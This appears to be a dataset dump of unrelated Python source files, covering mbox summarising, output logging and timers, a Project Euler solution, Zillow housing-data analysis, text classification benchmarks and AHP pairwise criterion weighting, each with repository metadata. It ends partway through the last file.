    field_timestamp = mail[50:81].replace('\x00', ' ')
    field_from = mail[82:145].replace('\x00', ' ')
    field_subject = mail[146:209].replace('\x00', ' ')
    summary = str(x+1).center(5, ' ') + ' | ' + field_timestamp.rstrip().center(32, ' ') + ' | ' + field_from + ' | ' + field_subject
    fsummary.write(summary + '\n')
    # High bit of byte 47 appears to flag an attachment — heuristic count.
    if (ord(field_unknown[47]) & 0x80) == 0x80:
        attachment_count += 1
fsummary.write('\n') #will just print a single line
fsummary.write('Mbox name: ' + getMboxName(f).replace('\x00', ' ') + '\n')
fsummary.write('Mbox size: ' + str(len) + '\n')
fsummary.write('Est. No. emails with attachments: ' + str(attachment_count) + '\n')
f.close()
fsummary.close()
| true |
6c1ccc92d79cb4e7ce01b52e822740dd2e6cdf0a | Python | VignoliniLab/2D-Structure-Designer | /powertools.py | UTF-8 | 2,912 | 2.6875 | 3 | [] | no_license | from __future__ import division
import subprocess
import shutil
import time
import sys
import os
def outputFolder(RESDIR,force=False,logfile='log.out'):
    """Prepare a result directory and tee stdout/stderr into a log file inside it.

    Creates *RESDIR* if missing (prompting before reuse unless *force*),
    copies the running script into it for reproducibility, then redirects
    both stdout and stderr through a `tee` subprocess so all output is also
    written to ``RESDIR/logfile``. Returns the normalised RESDIR (with a
    trailing slash).
    """
    if RESDIR[-1] != "/":
        RESDIR += "/"
    if os.path.exists(RESDIR):
        if not force:
            try:
                #Python 2
                ans = raw_input("The dir " + RESDIR + " already exists, continue? (y/n)")
            except NameError:
                #Python 3
                ans = input("The dir " + RESDIR + " already exists, continue? (y/n)")
            if not ans=='y':
                exit("Quitting instead of overwriting")
    else:
        os.makedirs(RESDIR)
    print("Resultdir is: " + RESDIR)
    # Snapshot the running script alongside its results.
    shutil.copyfile(os.path.abspath(sys.argv[0]),RESDIR+sys.argv[0])
    # Duplicate stdout/stderr file descriptors onto tee's stdin so everything
    # printed from here on is mirrored into the log file.
    tee = subprocess.Popen(['tee', '%s/%s' % (RESDIR, logfile)],
                           stdin=subprocess.PIPE)
    sys.stdout.flush()
    os.dup2(tee.stdin.fileno(), sys.stdout.fileno())
    sys.stderr.flush()
    os.dup2(tee.stdin.fileno(), sys.stderr.fileno())
    return RESDIR
# Simple wall-clock timers backed by two module-level mutable buffers.
# NOTE(review): both backing globals below are commented out, so every
# function here raises NameError as written — they need to be re-enabled
# (e.g. _ittime = [0., 0.] and _subtimestring = [""]).
#_ittime = pl.zeros(2) #First entry is updater per printIterTime, second per printSubTime
def printIterTime():
    # Print time since the previous call, then reset both timer slots.
    tic = time.time()
    if not _ittime[0] == 0.:
        print("Iteration time: {:.2f}s".format(tic-_ittime[0]))
    _ittime[0]=tic
    _ittime[1]=tic
#To be used "within" printIterTime
def printSubTime(description):
    # Print time since the previous sub-timestamp, labelled *description*.
    tic = time.time()
    if not _ittime[1] == 0.:
        print(description + " time: {:.2f}s".format(tic-_ittime[1]))
    _ittime[1]=tic
#_subtimestring = [""]
def gatherSubTime(description):
    # Like printSubTime, but accumulate the line into a buffer instead of printing.
    tic = time.time()
    if not _ittime[1] == 0.:
        _subtimestring[0] += description + " time: {:.2f}s\n".format(tic-_ittime[1])
    _ittime[1]=tic
def printGatheredTimes():
    # Flush and clear the accumulated sub-time report.
    print(_subtimestring[0])
    _subtimestring[0] = ""
##
#
# A dictionary class with a couple of extra features:
# * If an unindexed entry is accessed an empty list is returned,
# which means that commands like
# DH["myVar"] += [2]
#   do not require initialisation of DH["myVar"]. This is convenient
# for looping
#
# * entries created using const() are accessed as an attribute. For example
# DH.const("myVar",2)
# print DH.myVar
class dataHandler(dict):
    """A dict with two conveniences (see the comment block above the class):

    * Missing keys auto-initialise to an empty list, so ``DH["v"] += [x]``
      needs no prior setup.
    * ``const()``/``consts()`` register attribute-style constants
      (``DH.myVar``). NOTE: they are stored on the *class* via setattr, so
      constants are shared by every dataHandler instance.

    Fixes over the original (file is otherwise Python-3 style):
    * ``self.has_key(key)`` — removed in Python 3 — replaced by ``key in self``.
    * ``dump`` formatted ``type(...)`` with the ``:s`` spec, which raises
      TypeError on Python 3; now stringified explicitly. The output file is
      also managed by ``with`` so it closes on error.
    """

    def __init__(self, *args, **kwargs):
        super(dataHandler, self).__init__(*args, **kwargs)
        self._const = []

    def __getitem__(self, key):
        if key in self:
            return super(dataHandler, self).__getitem__(key)
        # Unindexed entry: create and return an empty list.
        self[key] = []
        return self[key]

    def const(self, key, val):
        """Register *key* as a class-level constant unless the name is taken."""
        if not key in dir(self):
            self._const += [key]
            setattr(dataHandler, key, val)
        else:
            print("dataHandler: name '{:s}' is already in use".format(key))

    def consts(self, dic):
        """Register every key/value pair of *dic* via const()."""
        for key in dic:
            self.const(key, dic[key])

    def dump(self, PATH):
        """Write one 'name !value !type !type' line per registered constant."""
        with open(PATH, 'w') as f:
            for key in self._const:
                data = getattr(dataHandler, key)
                f.write("{:s} !{:s} !{:s} !{:s}\n".format(
                    key.ljust(15), str(data).ljust(15), str(type(key)), str(type(data))))
# Demo / smoke test of dataHandler when run as a script.
if __name__ == "__main__":
    a = dataHandler()
    a.const("it",5)
    # Re-registering "it" prints the already-in-use warning; "it2" is added.
    a.consts({"it" :5,
              "it2" :3})
    print(a.it)
    print(a.it2)
    # Auto-initialised list entry.
    a["ab"] += [2]
    print(a["ab"])
| true |
ab79576118ad6be79f9f7b16e5e08477814fe880 | Python | jykim256/Project-Euler | /002.py | UTF-8 | 159 | 3.28125 | 3 | [] | no_license | arr = [0,1]
a = arr[-1]
b = arr[-2]
while a < 4000000:
arr.append(a + b)
a = arr[-1]
b = arr[-2]
sum = 0
for i in arr:
if i % 2 == 0:
sum += i
print(sum) | true |
5f273ff81536fcf635a4ea6f36d732646a3a9c9c | Python | abandonsea/deepinsight-iqa | /deepinsight_iqa/data_pipeline/nima_gen/schema/AVA/get_labels.py | UTF-8 | 3,849 | 2.796875 | 3 | [
"Apache-2.0"
] | permissive | import json
import argparse
import numpy as np
import pandas as pd
from maxentropy.skmaxent import MinDivergenceModel
import logging
import glob2
import os
logger = logging.getLogger(__name__)
CHOICES = ["mos_to_prob", "prob_to_mos"]
def normalize_labels(labels):
    """Scale *labels* so its entries sum to 1 (a probability distribution)."""
    arr = np.array(labels)
    total = arr.sum()
    return arr / total
def calc_mean_score(score_dist):
    """Expectation of a (possibly unnormalised) 10-bin score distribution.

    Bins correspond to scores 1..10.
    """
    dist = np.array(score_dist)
    dist = dist / dist.sum()  # inline normalisation (same as normalize_labels)
    scores = np.arange(1, 11)
    return (dist * scores).sum()
def load_json(file_path):
    """Deserialize and return the JSON document stored at *file_path*."""
    with open(file_path, 'r') as handle:
        raw = handle.read()
    return json.loads(raw)
def save_json(data, target_file, prefix=""):
    """Serialize *data* as pretty, key-sorted JSON to ``<prefix>_<target_file>``."""
    out_path = f"{prefix}_{target_file}"
    with open(out_path, 'w') as handle:
        json.dump(data, handle, indent=2, sort_keys=True)
# the maximised distribution must satisfy the mean for each sample
def get_features():
    """Feature functions for the max-entropy model: the identity only,
    which constrains the fitted distribution's mean."""
    def identity(x):
        return x
    return [identity]
def get_max_entropy_distribution(mean: float):
    """Fit the minimum-divergence (max-entropy) distribution over 10 score
    bins whose expectation equals *mean*, and return its probabilities.

    (Annotation changed from ``pd.Series``: parse_raw_data passes the scalar
    ``row['mos']`` here.)
    """
    SAMPLESPACE = np.arange(10)
    features = get_features()
    model = MinDivergenceModel(features, samplespace=SAMPLESPACE, algorithm='CG')
    # set the desired feature expectations and fit the model
    X = np.array([[mean]])
    model.fit(X)
    return model.probdist()
def get_dataframe(mean_raw_file):
    """Load the space-separated raw MOS file into a labelled DataFrame.

    Columns: distorted_path, reference_path, mos.
    """
    frame = pd.read_csv(mean_raw_file, skiprows=0, header=None, sep=' ')
    frame.columns = ['distorted_path', 'reference_path', 'mos']
    return frame
def parse_raw_data(df):
    """Convert raw MOS rows into max-entropy label samples, split 70/30.

    Each row becomes ``{'image_id', 'label'}`` where the label is the
    max-entropy distribution matching the row's MOS. Samples are shuffled,
    then split into train (70%) and test (30%) lists.

    Fixes: the original assigned the result of ``np.random.shuffle`` (which
    shuffles in place and returns None) to ``indices``, and computed a float
    ``train_size`` that cannot be used as a slice bound — both crashed.
    """
    samples = []
    for i, row in df.iterrows():
        max_entropy_dist = get_max_entropy_distribution(row['mos'])
        samples.append({'image_id': row['distorted_path'].split('.')[0],
                        'label': max_entropy_dist.tolist()})
    # Split data into test and train set.
    indices = np.arange(len(samples))
    np.random.shuffle(indices)  # in-place; returns None
    train_size = int(len(indices) * 0.7)
    train_samples = [samples[x] for x in indices[:train_size]]
    test_samples = [samples[x] for x in indices[train_size:]]
    return train_samples, test_samples
def mos_to_prob(source_file, target_file):
    """Calculate probability distributions from MOS values and save to JSON.

    Writes two files, ``<target_file>_train.json`` and ``<target_file>_test.json``
    (the prefix is applied inside save_json).
    """
    df = get_dataframe(source_file)
    train_samples, test_samples = parse_raw_data(df)
    for sample, filename in [(train_samples, "train.json"), (test_samples, "test.json")]:
        save_json(sample, filename, prefix=target_file)
    logger.info(f'Done! Saved JSON at {target_file}')
def prob_to_mos(src_path, target_file):
    """Merge per-image probability JSON files into a single shuffled MOS CSV.

    Arguments:
        src_path: directory containing the *.json label files.
        target_file: path of the CSV file to write.

    Fixes: the original used ``ava_labels = +[...]`` — unary plus applied to
    a list, a TypeError that also never accumulated results — and called
    ``.items()`` on the *list* returned by load_json. Each JSON file is a
    list of ``{'image_id', 'label'}`` samples (see mos_to_prob), so the list
    is iterated directly.
    """
    ava_labels = []
    for filename in glob2.glob(os.path.join(src_path, "*.json")):
        for row in load_json(filename):
            ava_labels.append({"image_id": row['image_id'],
                               "label": calc_mean_score(row['label'])})
    df = pd.DataFrame.from_dict(ava_labels)
    # Shuffle rows before writing.
    df = df.iloc[np.random.permutation(len(df))]
    df.columns = ["image_id", "label"]
    df.to_csv(target_file)
    logger.info(f'Done! Saved CSV at {target_file} location')
def _parse_arguments():
    """Build the CLI argument parser and parse sys.argv."""
    cli = argparse.ArgumentParser()
    cli.add_argument("-c", "--conversion_type", choices=CHOICES, required=True,
                     help="Convert mos to probability distribution and vice-versa.")
    cli.add_argument('-sf', '--source-path', required=True,
                     help='csv/json file path of raw mos_with_names file')
    cli.add_argument('-tf', '--target-path', required=True,
                     help='file path of json/csv labels file to be saved')
    return cli.parse_args()
def _cli():
    """Entry point: dispatch to the requested conversion."""
    args = _parse_arguments()
    handlers = {"mos_to_prob": mos_to_prob, "prob_to_mos": prob_to_mos}
    handler = handlers.get(args.conversion_type)
    if handler is None:
        raise ValueError("Invalid choices args")
    handler(args.source_path, args.target_path)


if __name__ == '__main__':
    _cli()
| true |
c26c7437e41a02f88566f7c0131ca732d9f5723b | Python | hitallocavas/information-retrieval-classifier | /process_data.py | UTF-8 | 5,679 | 2.921875 | 3 | [] | no_license | import os
import json
import nltk, re, pprint
from bs4 import BeautifulSoup
import time
import datetime
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import BernoulliNB
from sklearn.tree import DecisionTreeClassifier
from sklearn import svm
from sklearn.linear_model import LogisticRegression
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.metrics import f1_score
nltk.download('punkt')
from nltk import word_tokenize
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
stemmer = PorterStemmer()
texts = []
statuses = []
def process():
    """Read every JSON file under ./data, clean each page's text and record
    its binary label in the module-level `texts` / `statuses` lists."""
    data_dir = 'data'
    for entry in os.listdir(data_dir):
        path = data_dir + '/' + entry
        with open(path, encoding='utf-8') as handle:
            pages = json.load(handle)
        for page in pages:
            texts.append(process_text(page['content']))
            # Label is 1 when the page's status is the string 'True', else 0.
            statuses.append(1 if page['status'] == 'True' else 0)
def process_text(text):
    """Clean one raw HTML document into a stemmed, space-joined token string.

    Pipeline: strip HTML -> keep letters only -> lowercase -> tokenize ->
    drop English stopwords -> Porter-stem each token.
    """
    # Removendo Tags e conteúdos do HTML
    soup = BeautifulSoup(text)
    text = soup.get_text()
    # Removendo todos os caracteres desnecessários
    text = re.sub('[^A-Za-z]', ' ', text)
    # Padronizando Case
    text = text.lower()
    # Tokenizando texto
    tokens = word_tokenize(text)
    # Bug fix: the original called tokens.remove(word) while iterating the
    # same list, which skips the element after every removal and leaves many
    # stopwords in place. Filtering into a new list inspects every token.
    # The stopword set is also built once instead of per token.
    stop_words = set(stopwords.words('english'))
    tokens = [token for token in tokens if token not in stop_words]
    # Realizando Stemming
    tokens = [stemmer.stem(token) for token in tokens]
    return ' '.join(tokens)
def bag_of_words():
    """Vectorise the corpus (top 1000 tokens) and return a train/test split."""
    vectoriser = CountVectorizer(max_features=1000)
    features = vectoriser.fit_transform(texts).toarray()
    return train_test_split(features, statuses)
def naive_bayes(X_train, X_test, y_train, y_test):
    """Train a Bernoulli naive-Bayes model and print its test metrics."""
    model = BernoulliNB().fit(X_train, y_train)
    predictions = model.predict(X_test)
    print_metrics(predictions, y_test, 'Naive Bayes')
def support_vector_machine(X_train, X_test, y_train, y_test):
    """Train a linear-kernel SVM and print its test metrics."""
    model = svm.SVC(kernel='linear')  # linear kernel
    model.fit(X_train, y_train)
    predictions = model.predict(X_test)
    print_metrics(predictions, y_test, 'Support Vector Machine')
def decision_trees(X_train, X_test, y_train, y_test):
    """Train a decision tree and print its test metrics."""
    model = DecisionTreeClassifier().fit(X_train, y_train)
    predictions = model.predict(X_test)
    print_metrics(predictions, y_test, 'Decision Trees (JV8)')
def logistic_regression(X_train, X_test, y_train, y_test):
    """Train a logistic-regression model and print its test metrics."""
    model = LogisticRegression(solver='lbfgs', max_iter=10000).fit(X_train, y_train)
    predictions = model.predict(X_test)
    print_metrics(predictions, y_test, 'Logistic Regression')
def multilayer_perceptron(X_train, X_test, y_train, y_test):
    """Train an MLP classifier and print its test metrics.

    Fix: the original fitted the estimator twice back to back
    (`MLPClassifier(...).fit(...)` followed by `classifier.fit(...)`);
    a single fit is sufficient and, with random_state=1, produces the
    same model in half the training time.
    """
    classifier = MLPClassifier(random_state=1, max_iter=300)
    classifier.fit(X_train, y_train)
    y_pred = classifier.predict(X_test)
    print_metrics(y_pred, y_test, 'MultiLayer Perceptron')
def print_metrics(y_pred, y_test, classification_method):
    """Print accuracy, precision and recall for the given predictions."""
    scores = {
        'Accuracy': accuracy_score(y_test, y_pred),
        'Precision': precision_score(y_test, y_pred),
        'Recall': recall_score(y_test, y_pred),
    }
    print("################################## " + classification_method + " ##################################")
    print('Accuracy: ' + str(scores['Accuracy']))
    print('Precision: ' + str(scores['Precision']))
    print('Recall: ' + str(scores['Recall']))
def run_naive_bayes(X_train, X_test, y_train, y_test):
    """Run the naive-Bayes experiment and print its wall-clock duration.

    Fix: the original printed `difference.microseconds`, which is only the
    sub-second component of the timedelta (wrong for runs over a second)
    while the label says "segundos"; total_seconds() is the true duration.
    """
    first_time = datetime.datetime.now()
    naive_bayes(X_train, X_test, y_train, y_test)
    later_time = datetime.datetime.now()
    difference = later_time - first_time
    print('Tempo Naive Bayes: ' + str(difference.total_seconds()) + ' segundos')
def run_decision_three(X_train, X_test, y_train, y_test):
    """Run the decision-tree experiment and print its wall-clock duration.

    Fix: `timedelta.microseconds` is only the sub-second component of the
    elapsed time; total_seconds() matches the "segundos" label.
    """
    first_time = datetime.datetime.now()
    decision_trees(X_train, X_test, y_train, y_test)
    later_time = datetime.datetime.now()
    difference = later_time - first_time
    print('Tempo Arvore de Decisão: ' + str(difference.total_seconds()) + ' segundos')
def run_svm(X_train, X_test, y_train, y_test):
    """Run the SVM experiment and print its wall-clock duration.

    Fix: `timedelta.microseconds` is only the sub-second component of the
    elapsed time; total_seconds() matches the "segundos" label.
    """
    first_time = datetime.datetime.now()
    support_vector_machine(X_train, X_test, y_train, y_test)
    later_time = datetime.datetime.now()
    difference = later_time - first_time
    print('Tempo SVM: ' + str(difference.total_seconds()) + ' segundos')
def run_multi_layer_perceptron(X_train, X_test, y_train, y_test):
    """Run the MLP experiment and print its wall-clock duration.

    Fix: `timedelta.microseconds` is only the sub-second component of the
    elapsed time; total_seconds() matches the "segundos" label.
    """
    first_time = datetime.datetime.now()
    multilayer_perceptron(X_train, X_test, y_train, y_test)
    later_time = datetime.datetime.now()
    difference = later_time - first_time
    print('Tempo MultiLayerPerceptron: ' + str(difference.total_seconds()) + ' segundos')
def run_logistic_regression(X_train, X_test, y_train, y_test):
    """Run the logistic-regression experiment and print its duration.

    Fix: `timedelta.microseconds` is only the sub-second component of the
    elapsed time; total_seconds() matches the "segundos" label.
    """
    first_time = datetime.datetime.now()
    logistic_regression(X_train, X_test, y_train, y_test)
    later_time = datetime.datetime.now()
    difference = later_time - first_time
    print('Tempo Regressão Logística: ' + str(difference.total_seconds()) + ' segundos')
if __name__ == '__main__':
    # Build the corpus and labels, vectorise them once, then benchmark each
    # classifier on the same train/test split, in the same order as before.
    process()
    X_train, X_test, y_train, y_test = bag_of_words()
    for experiment in (run_naive_bayes, run_decision_three, run_svm,
                       run_multi_layer_perceptron, run_logistic_regression):
        experiment(X_train, X_test, y_train, y_test)
| true |
094254efa341cc68c975f24e7ce80a1f00fdfc09 | Python | kkjoboy/ZillowHousingMarketAnalysis | /HouseAnalysis.py | UTF-8 | 12,548 | 3.125 | 3 | [
"MIT"
] | permissive | # Author: Joshua Mielke
#
import csv
##########################################################################################################################
# Post-Processing & Data Loading Data Dictionaries, used for calculating ranks
# Ranking Data Dictionaries, lowest aggregate number is highest rank
#
# Should be a dictionary of dictionaries, keys being zip codes and values being another dictionary of different values
# such as '3MonthMovingAverageRent' : 1253 | 'RentHomePricePercent' : 1.2 | 'RentGrowthMovingAverage' : 3.5
#
# Ranking values include:
# 1. AverageRent - Average rent from 3 month moving average
# NOTE: This is the value of the latest ZRI
# 2. OnePercentRule - TODO Used for calculating rent divided by total cost of house
# 3. RentGrowth - 3 month moving average of rent growth
# 4. PriceAppreciation - TODO 3 month moving average of price appreciation based on ZHVI home values
# 5. PriceAppreciationSqft - TODO 3 month moving average of price appreciation by square footage
# 6. PctPriceCuts - TODO Percent of SFRs that have cuts in price (high = less desirable, low = more desirable)
# 7. AverageHomeValue - Average home value from ZHVI
##########################################################################################################################
ComputedData = {}     # zip code -> {metadata columns + computed metrics (AverageRent, RentGrowth, AverageHomeValue)}
ZipCodeRankings = {}  # zip code -> aggregate ranking; not populated anywhere in this file yet
Header = []           # CSV header row copied from the ZRI spreadsheet (column names, incl. dates)
# Global Data Stores (Note: Uses lots of memory to hold global arrays of the excel file)
rentPriceData = {}        # raw ZRI rental rows keyed by zip code: [City, State, Metro, County, SizeRank, dates, values]
housePriceData = {}       # raw ZHVI home-value rows keyed by zip code, same layout as rentPriceData
priceAdjustmentData = {}  # raw listings-with-price-cut rows keyed by zip code, same layout
# Filters
RentHomePricePercent = 1.0  # rent / home-price percentage threshold -- not referenced elsewhere in this file yet
##########################################################################################################################
# ZRI Time Series SFR ($) - Zillow [Rental Values]
#
# The Zillow Rent Index (ZRI) is a smooth measure of the median estimated market rate rent across a given region and
# housing type. This value will be used in conjuction with the Median Rent List Price to calculate a median rental rate
# across a given Zip Code. The median rental rate will be used with the median home value to calculate a rank based on
# ratio of rent to home value.
##########################################################################################################################
# Loads the ZRI Rental Prices for Single Family Residences (SFR) data from Zillow
def loadZRIRentalPriceSFRZillow():
    """Load the Zillow ZRI single-family rental CSV into rentPriceData.

    Also copies the CSV header row into the module-level Header list.
    Each stored record is [City, State, Metro, County, SizeRank,
    time-series column names, time-series values].
    """
    with open('Zip_Zri_SingleFamilyResidenceRental.csv', newline='', encoding='utf-8') as csv_file:
        reader = csv.reader(csv_file, delimiter=',')
        header = next(reader)
        Header.extend(header)
        for row in reader:
            # Columns 0-6 are metadata; everything after is the monthly series.
            series_dates = list(header[7:])
            series_values = list(row[7:])
            rentPriceData[row[1]] = [row[2], row[3], row[4], row[5], row[6],
                                     series_dates, series_values]
def loadAverageRent():
    """Copy each zip code's metadata and latest ZRI rent into ComputedData.

    ZRI is already published as a 3-month moving average, so the most
    recent series value is stored directly as 'AverageRent'.
    """
    for zipcode, record in rentPriceData.items():
        # First time this zip code is seen, copy its descriptive columns.
        if zipcode not in ComputedData:
            ComputedData[zipcode] = {
                Header[2]: record[0],  # City
                Header[3]: record[1],  # State
                Header[4]: record[2],  # Metro
                Header[5]: record[3],  # County
                Header[6]: record[4],  # Size Rank
            }
        # Most recent rental value (3-month moving average).
        ComputedData[zipcode]['AverageRent'] = record[6][-1]
def loadRentGrowth():
    """For each zip code, compute the mean of a 3-point moving average of
    month-over-month rent growth (%) over the last 30 series entries, and
    store it in ComputedData as 'RentGrowth'.

    NOTE(review): the inline comment below says "past 5 years" but the
    slice [-30:] covers 30 monthly entries (~2.5 years) -- confirm intent.
    Assumes series values parse as int and are non-zero; an all-empty
    window would make the final division raise ZeroDivisionError.
    """
    # Grab each zip code and load average rent into computed data
    for zipcode in rentPriceData:
        # Check to make sure if Zip Code already exists in Computed Data, otherwise add it
        if zipcode not in ComputedData:
            ComputedData[zipcode] = {}
            ComputedData[zipcode][Header[2]] = rentPriceData[zipcode][0] # City
            ComputedData[zipcode][Header[3]] = rentPriceData[zipcode][1] # State
            ComputedData[zipcode][Header[4]] = rentPriceData[zipcode][2] # Metro
            ComputedData[zipcode][Header[5]] = rentPriceData[zipcode][3] # County
            ComputedData[zipcode][Header[6]] = rentPriceData[zipcode][4] # Size Rank

        # first/second/third hold the last three monthly growth rates;
        # they shift one slot per iteration, and `third` is recomputed
        # once a previous month's value exists.
        rentGrowthList = []
        first = None
        second = None
        third = None
        prev = None
        # Calculate rent growth from past 5 years of data and store in rentGrowthList
        for rentValue in rentPriceData[zipcode][6][-30:]:
            # Shift values for moving average (3 point moving average)
            first = second
            second = third
            if prev is not None:
                third = (int(rentValue) - prev) / prev * 100
            # None check: only average once three growth values are available
            if first is not None and second is not None and third is not None:
                movingAverage = (first + second + third) / 3 # Calculate moving average with new value
                rentGrowthList.append(movingAverage) # Add new value to moving average list
            prev = int(rentValue) # Store previous value for next iteration

        # Calculate 3 Month Moving Average of rent growth
        rentGrowth = sum(rentGrowthList) / len(rentGrowthList)
        # print(zipcode + ": " + str(rentGrowth))
        # Store average rent growth in ComputedData
        ComputedData[zipcode]['RentGrowth'] = rentGrowth
##########################################################################################################################
# Median List Price ($ Per Square Foot) - Zillow [Rental Values]
##########################################################################################################################
#TBD
##########################################################################################################################
# Median Rent List Price ($ Per Square Foot), Single-Family Residence - Zillow [Rental Listings]
##########################################################################################################################
#TBD
##########################################################################################################################
# ZHVI Single-Family Homes Time Series ($) - Zillow [Home Values]
##########################################################################################################################
# Loads the ZHVI Home Prices for Single Family Residences (SFR) data from Zillow
def loadZHVIHomePriceSFRZillow():
    """Load the Zillow ZHVI single-family home-value CSV into housePriceData.

    Each stored record is [City, State, Metro, County, SizeRank,
    time-series column names, time-series values].
    """
    with open('Zip_Zhvi_SingleFamilyResidence.csv', newline='', encoding='utf-8') as csv_file:
        reader = csv.reader(csv_file, delimiter=',')
        header = next(reader)
        for row in reader:
            # Columns 0-6 are metadata; everything after is the monthly series.
            series_dates = list(header[7:])
            series_values = list(row[7:])
            housePriceData[row[1]] = [row[2], row[3], row[4], row[5], row[6],
                                      series_dates, series_values]
# Gets the average home value for each zip code
def getAverageHomeValue():
    """Copy each zip code's metadata and latest ZHVI home value into
    ComputedData as 'AverageHomeValue'.

    Fix: replaces the acknowledged "hacky" slice-loop (`for value in
    series[-1:]`) with direct last-element indexing, and explicitly skips
    zip codes whose series is empty instead of silently leaving the key
    unset via an empty loop.
    """
    for zipcode in housePriceData:
        # First time this zip code is seen, copy its descriptive columns.
        if zipcode not in ComputedData:
            ComputedData[zipcode] = {}
            ComputedData[zipcode][Header[2]] = housePriceData[zipcode][0]  # City
            ComputedData[zipcode][Header[3]] = housePriceData[zipcode][1]  # State
            ComputedData[zipcode][Header[4]] = housePriceData[zipcode][2]  # Metro
            ComputedData[zipcode][Header[5]] = housePriceData[zipcode][3]  # County
            ComputedData[zipcode][Header[6]] = housePriceData[zipcode][4]  # Size Rank

        series = housePriceData[zipcode][6]
        if not series:
            # No price history for this zip code; nothing to record.
            continue
        value = series[-1]
        print(zipcode + ": " + value)
        ComputedData[zipcode]['AverageHomeValue'] = value
##########################################################################################################################
# Monthly Home Sales (Number, Seasonally Adjusted) - Zillow [Home Listings and Sales]
##########################################################################################################################
#TBD
##########################################################################################################################
# Monthly For-Sale Inventory (Number, Seasonally Adjusted) - Zillow [Home Listings and Sales]
##########################################################################################################################
#TBD
##########################################################################################################################
# New Monthly For-Sale Inventory (Number, Seasonally Adjusted) - Zillow [Home Listings and Sales]
##########################################################################################################################
#TBD
##########################################################################################################################
# Listings With Price Cut - Seasonally Adjusted, SFR (%) - Zillow [Home Listings and Sales]
##########################################################################################################################
# Loads the Listings With Price Cut - Seasonally Adjusted, SFR (%) data from Zillow
def loadZipListingsPriceCutSeasAdjZillow():
    """Load the seasonally adjusted %-of-listings-with-price-cut CSV.

    Fix: the original stored these rows into housePriceData, clobbering
    the ZHVI home values loaded by loadZHVIHomePriceSFRZillow(); they
    belong in the priceAdjustmentData store declared for this dataset.
    """
    with open('Zip_Listings_PriceCut_SeasAdj_SingleFamilyResidence.csv', newline='', encoding='utf-8') as csv_file:
        reader = csv.reader(csv_file, delimiter=',')
        header = next(reader)
        for row in reader:
            # Columns 0-6 are metadata; everything after is the monthly series.
            timeSeriesHeader = list(header[7:])
            timeSeriesPrices = list(row[7:])
            priceAdjustmentData[row[1]] = [row[2], row[3], row[4], row[5], row[6],
                                           timeSeriesHeader, timeSeriesPrices]
##########################################################################################################################
# Main Function
##########################################################################################################################
def main():
    """Load the Zillow spreadsheets and populate ComputedData.

    Order matters: the raw loaders fill the stores that the aggregation
    steps below read from.
    """
    steps = (
        loadZRIRentalPriceSFRZillow,  # raw ZRI rents (also fills Header)
        loadZHVIHomePriceSFRZillow,   # raw ZHVI home values
        loadAverageRent,              # latest rent per zip code
        loadRentGrowth,               # rent-growth moving average
        getAverageHomeValue,          # latest home value per zip code
    )
    for step in steps:
        step()


if __name__ == "__main__":
    main()
ce1a228a0c46e5b168d91e5fb947fef118b039af | Python | theabhishekmandal/Python | /defining_functions/demo4.py | UTF-8 | 232 | 3.75 | 4 | [] | no_license | '''
In this function example we are implementing that ,there can be arbitrary number of arguments
'''
def hello(*args,sep=' '):
return sep.join(args)
print(hello('abhishek','mandal','is','here'))
print(hello('what','are','you')) | true |
03278ad2f822bdf475532f596b6e3c6edbc2c54f | Python | harishtallam/Learning-Python | /Learn_Python_by_Udemy_Navin/6_Functions/2_functions_with_args.py | UTF-8 | 569 | 3.953125 | 4 | [] | no_license |
# Example 1
def update(x):
x = 8
print(x)
update(10) # Here, even after passing 10 as an argument. value 8 is overwritten in function
# Example 2
def update(x):
x = 8
print("x: ", x)
a = 10
update(a)
print("a: ", a)
# Example 3
def update(x1):
print(id(x1))
x1 = 8
print(id(x1))
print("x1: ", x1)
a1 = 10
print(id(a1))
update(a1)
print("a1: ", a1)
# Example 4
def update(lst):
print(id(lst))
lst[1] = 40
print(id(lst))
print("lst: ", lst)
lst = [10, 20, 30]
print(id(lst))
update(lst)
print("lst: ", lst)
| true |
983e3b4a792df2cfd2d9ce5ea135f82f7fc154b2 | Python | piccicla/pysdss | /pysdss/multicriteria/weight/pairwise.py | UTF-8 | 3,733 | 3.5625 | 4 | [] | no_license | # -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name: pairwise.py
# Purpose: criterion weighting with pairwise comparison
#
#
# Author: claudio piccinini
#
# Updated: 11/04/2017
# -------------------------------------------------------------------------------
import numpy as np
def get_consistency_ratio(n):
"""
Get the random inconsistency index for the current number of evaluation criteria
:param n: the number of evaluation criteria
:return: the random
"""
#random inconsistency indices (Saaty, 1980)
ri = {1:0,2:0,3:0.58,4:0.90,5:1.12,6:1.24,7:1.32,8:1.41,9:1.45,10:1.49,11:1.51,12:1.48,13:1.56,
14:1.57,15:1.59}
return ri[n]
def pairwise_comparison(matrix):
"""
Pairwise comparison for the analytic hierarchy process(Saary,1980)
return consistency_ratio and a list with criterion_weights
consitency ratio must be <0.10 otherwise the pairwise comparison matrix must be recalculated
:param matrix: The pairwise comparison matrix of the evaluation criteria as a numpy array
The pairwise comparison matrix scores should follow this table
1 Equal importance
2 Equal to moderate importance
3 Moderate importance
4 Moderate to strong importance
5 Strong importance
6 Strong to very strong importance
7 Very strong importance
8 Very to extremely strong importance
9 Extreme importance
:return: consistency_ratio and a list with criterion_weights
"""
if matrix.shape[0] != matrix.shape[1]:
raise ValueError("The method needs a square matrix")
n_elements = matrix.shape[0]
if n_elements < 3 or n_elements > 15:
raise ValueError("The pairwise comparison matrix needs 3 to 15 elements")
original_matrix = np.copy(matrix)
#####CRITERION WEIGHTS########
# step1 calculate sum of columns
column_total = [np.sum(matrix[:,i]) for i in range(matrix.shape[1])]
# step2 normalized pairwise comparison matrix
for i, s in enumerate(column_total):
matrix[:, i] = matrix[:, i]/s
#step3 compute criterion weights as average values by row
criterion_weights=[np.sum(matrix[i, :])/matrix.shape[1] for i in range(matrix.shape[1])]
#####CONSISTENCY RATIO#####
# step1
for i, s in enumerate(criterion_weights):
original_matrix[:, i] = original_matrix[:, i]*s
sum_by_row = np.sum(original_matrix,axis=1)
# step2
consistency_vector = sum_by_row/np.array(criterion_weights)
lmbda = np.mean(consistency_vector)
consistency_index = (lmbda - n_elements)/ (n_elements-1)
consistency_ratio = consistency_index/get_consistency_ratio( n_elements)
return consistency_ratio, criterion_weights
if __name__ == "__main__":
